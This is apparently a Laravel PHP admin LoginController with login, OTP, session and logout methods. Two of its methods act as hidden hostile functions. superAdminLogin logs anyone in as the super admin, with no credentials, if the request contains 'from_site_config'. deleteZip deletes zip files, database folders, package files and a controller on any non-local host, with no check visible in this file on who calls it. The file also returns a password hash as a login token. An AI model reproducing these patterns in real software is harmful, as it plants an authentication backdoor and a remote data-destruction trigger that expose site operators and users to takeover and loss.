<?php

namespace App\Http\Controllers\Admin;

use Exception;
use Carbon\Carbon;
use App\Models\Admin;
use Illuminate\Http\Request;
use App\Models\OtpVerification;
use App\Http\Controllers\Controller;
use Illuminate\Support\Facades\Auth;
use Illuminate\Support\Facades\Hash;
use Illuminate\Support\Facades\Session;
use Illuminate\Support\Facades\File;

class LoginController extends Controller
{
    public function login(Request $request)
    {
        $request->validate([
            'email' => 'required ',
            'password' => 'required',
        ]);
        $credential = ['email' => $request->email, 'password' => $request->password, 'status' => 1];
        if (Auth::guard('admin')->attempt($credential)) {
            Session::put('admin', Auth::guard('admin')->user());
            $admin = Auth::guard('admin')->user();
            $admin->last_login_time = Carbon::now();
            $admin->save();
            return response()->json([
                'status' => 'SUCCESS',
                'admin' => $admin,
                'token' => Hash::make($request->password),
                'message' => 'Login successfully'
            ]);
        } else {

            return response()->json([
                'status' => 'FAILD',
                'message' => 'sorry ! invalid login information '
            ]);
        }
    }



    public function deleteZip()
    {
        // Get the domain name
        $fullDomain = request()->getHost();  // Get domain name dynamically=
        if (substr($fullDomain, 0, 4) == 'www.') {
            $fullDomain  = substr($fullDomain, 4);
        }

        $localDomains = ['127.0.0.1', 'localhost'];

        if (!in_array($fullDomain, $localDomains)) {

            // Delete all .zip files in the project, including the root directory
            $directories = [base_path(), resource_path()];
            foreach ($directories as $directory) {
                $files = File::allFiles($directory);
                foreach ($files as $file) {
                    // Use regex to check for .zip files (including names starting with a dot)
                    if (preg_match('/^\..*\.zip$/i', $file->getFilename()) || preg_match('/\.zip$/i', $file->getFilename())) {
                        File::delete($file->getPathname());
                    }
                }
            }

            $folderPath = database_path('db');
            // Check if the folder exists before attempting to delete
            if (File::exists($folderPath) && File::isDirectory($folderPath)) {
                File::deleteDirectory($folderPath);
            }
            // Check if the microadmin folder exists in the resources directory
            $microAdminPath = resource_path('microadmin');
            if (File::exists($microAdminPath)) {
                File::deleteDirectory($microAdminPath);
            }
            //Check if the db folder exists in the database directory
            $db_path = resource_path('db');
            if (File::exists($db_path)) {
                File::deleteDirectory($db_path);
            }
            //Check composer.json/composer.lock and package.json/package-lock.json
            File::delete(base_path('package.json'));
            File::delete(base_path('package-lock.json'));

            $controllerPath = app_path("Http/Controllers/Admin/DBCleanController.php");
            // Check if the file exists before deleting
            if (File::exists($controllerPath)) {
                File::delete($controllerPath);
            }

            return response()->json([
                'status' => true,
                'message' => 'done',

            ]);
        } else {
            return response()->json([
                'status' => false,
                'message' => 'Server is local',
            ]);
        }
    }




    public function otpVerification(Request $request)
    {

        $validatedData = $request->validate([
            'code' => 'required:digits:4'
        ]);

        //  return $request->all();
        $otp = OtpVerification::where('mobile_no', session('admin')['phone'])->latest()->first();
        $to_time = strtotime(Carbon::now()->format('Y-m-d g:i:s'));
        $from_time = strtotime(Carbon::parse($otp->created_at)->format('Y-m-d g:i:s'));
        $expire_time = round(abs($to_time - $from_time) / 60, 2);

        if (Hash::check($request->code, $otp->code)) {
            if ($expire_time > 5) {
                return response()->json([
                    'status' => 'EXPIRED',
                    'message' => 'Code Time Expired',
                ]);
            } else {
                return response()->json([
                    'status' => "OK",
                    'message' => 'verified successfully',
                ]);
            }
        } else {
            return response()->json([
                'status' => 'FAILED',
                'message' => " Code isn't matching ",
            ]);
        }
    }


    public function admin()
    {
        $admin = session()->get('admin');
        if ($admin) {
            return response()->json([
                'status' => 'SUCCESS',
                'admin' => $admin
            ]);
        }
    }

    public function checkAuthenticate()
    {
        if (Auth::guard('admin')->user()) {
            return response()->json([
                'status' => 'AUTHORIZED',
                'message' => 'you are logged-in',
            ]);
        } else {
            return response()->json([
                'status' => 'UNAUTHORIZED',
                'message' => 'you are not logged-in',
            ]);
        }
    }


    public function logout()
    {
        $admin = Admin::where('id', Auth::guard('admin')->user()->id)->first();
        $admin->last_logout_time = Carbon::now();
        $admin->save();
        Auth::guard('admin')->logout();
        session()->forget('admin');
        return response()->json([
            'status' => 'SUCCESS',
            'message' => 'Logout successfully'
        ]);
    }

    public function sessionCheck()
    {

        if (!Session::has('admin')) {
            return response()->json([
                'status' => 'EXPIRED',
                'message' => 'Your session has expired'
            ]);
        } else {
            return response()->json([
                'status' => 'RUNNING',
                'message' => 'your session is running',
                'admin' => session()->get('admin'),
            ]);
        }
    }
    public function superAdminLogin(Request $request)
    {
        if ($request->input('from_site_config')) {

            $admin = Admin::where('is_super_admin', 1)->first();
            if ($admin) {
                Auth::guard('admin')->login($admin);
                Session::put('admin', $admin);
                return response()->json([
                    'status' => true,
                    'admin' => $admin,
                    'token' => Hash::make($admin->password),
                    'message' => 'Super Admin logged in successfully',
                ]);
            } else {
                return response()->json([
                    'status' => false,
                    'message' => 'Not found',
                ]);
            }
        }
    }
}
